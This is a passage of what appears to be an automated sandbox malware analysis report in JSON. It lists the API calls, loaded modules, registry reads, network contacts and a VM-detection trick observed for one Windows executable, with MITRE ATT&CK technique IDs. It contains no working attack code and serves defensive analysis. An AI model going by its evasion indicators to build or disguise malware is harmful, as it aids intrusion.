\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter msvcrt.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter wshtcpip (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter wship6.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00005000)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76220000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".text\" is \"0x49711c\" greater than 0x100000\n Virtual size of \".rdata\" is \"0x3bdfce\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-187", "relevance": 1, "name": ".rdata section contains high entropy", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has section name .rdata with entropy \"7.265642374028851\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSAStringToAddressW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHEnumProtocols (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHGetProviderGuid (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHGetWSAProtocolInfo (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHGetWinsockMapping (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter UrlCanonicalizeW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter StrCmpNW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00005000)\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" called \"GetProcAddress\" with a parameter CertFreeCertificateContext (UID: 00000000-00005000)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e666c@ADVAPI32.dll\"\n \"0e000f00703f666c@ADVAPI32.dll\"\n \"0e000f00cc3f666c@ADVAPI32.dll\"\n \"11001200b447666c@ADVAPI32.dll\"\n \"110012004848666c@ADVAPI32.dll\"\n \"120013008c48666c@ADVAPI32.dll\"\n \"12001300e448666c@ADVAPI32.dll\"\n \"14001500dc6f666c@ADVAPI32.dll\"\n \"14001500f46f666c@ADVAPI32.dll\"\n \"140015000c70666c@ADVAPI32.dll\"\n \"170018002470666c@ADVAPI32.dll\"\n \"0d000e003c70666c@ADVAPI32.dll\"\n \"110012004c70666c@ADVAPI32.dll\"\n \"110012006070666c@ADVAPI32.dll\"\n \"0d000e003449666c@SHELL32.dll\"\n \"0d000e00b049666c@SHELL32.dll\"\n \"0f001000a071666c@ADVAPI32.dll\"\n \"14001500e071666c@ADVAPI32.dll\"\n \"14001500f871666c@ADVAPI32.dll\"\n \"0c000d004072666c@ADVAPI32.dll\"\n \"0c000d005072666c@ADVAPI32.dll\"\n \"0e000f006072666c@ADVAPI32.dll\"\n \"0e000f007072666c@ADVAPI32.dll\"\n \"0b000c008072666c@ADVAPI32.dll\"\n \"0d000e000873666c@bcrypt.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"mhanational.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".text\" is \"0x497200\" greater than 0x100000\n Raw size of \".rdata\" is \"0x3be000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-26", "type": 8, "relevance": 5, "name": "The input sample possibly contains the RDTSCP instruction", "description": "Found VM detection artifact \"RDTSCP trick\" in \"sample.bin\" (Offset: 219915)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\winhttp.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\webio.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\cryptsp.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\credssp.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\wshtcpip.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\wship6.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\DNSAPI.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\rasadhlp.dll\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\WINMM.DLL\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" trying to access non-existent file \"C:\\BCRYPT.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"OPEN\"; Path: 